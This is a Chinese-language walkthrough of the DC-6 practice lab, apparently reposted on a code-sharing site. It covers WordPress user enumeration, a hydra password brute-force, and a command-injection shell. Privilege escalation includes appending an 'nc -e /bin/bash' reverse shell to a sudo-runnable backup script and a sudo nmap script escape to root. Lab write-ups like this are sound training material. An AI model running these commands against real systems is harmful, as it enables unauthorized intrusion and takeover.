ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

DC-6

2022-01-27 12:32:30  阅读:165  来源: 互联网

标签:shell jens DC 提权 sh backups graham


DC-6

目录

信息收集

先把wordy加到host中

nmap -T4 -A -p 1-65535 192.168.211.138

又是wordpress,扫一下

wpscan --url http://wordy/ --enumerate u

admin
sarah
graham
mark
jens

用户爆破

hydra爆破一下

hydra -L/root/桌面/username.txt -P /home/zidian/rockyou.txt wordy http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:<title>invalido</title>' -F

不知道为什么,每次爆破的密码不一样。换wpscan再爆破试试

爆了200M数据还没爆出来,不知道他们是怎么爆的,我嫖了

mark : helpdesk01

命令执行

在该模块下可以直接进行命令执行

但是网页中,输入受限,在burp中进行,直接弹shell

反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

成功反弹shell

提权

WWW-DATA到graham

系统SUID,内核提权好像都不可以,在/home下不同用户目录中查找是否能找到一些有用的信息

在/home/mark/stuff/things-to-do.txt内

似乎是graham用户的密码,那我们尝试登陆,即可以从web权限提升到用户权限

登陆成功

graham到jens

sudo -l

意思是graham用户可以执行backups.sh,jens执行备份文件不需要密码,我们看一下权限

ls -alR /home/jens/backups.sh

cat /etc/group

确实graham用户可以修改backups.sh,那我们加入反弹shell命令进可执行文件中,让jens执行

echo 'nc -e /bin/bash 192.168.211.131 9999' >> backups.sh

sudo -u jens ./backups.sh

jens到root

jens

直接可以执行nmap

5.2.0 之后,nmap 可以通过执行脚本来提权

echo 'os.execute("/bin/sh")' > getshell
sudo nmap --script=getshell

获取flag

标签:shell,jens,DC,提权,sh,backups,graham
来源: https://www.cnblogs.com/karsa/p/15849408.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有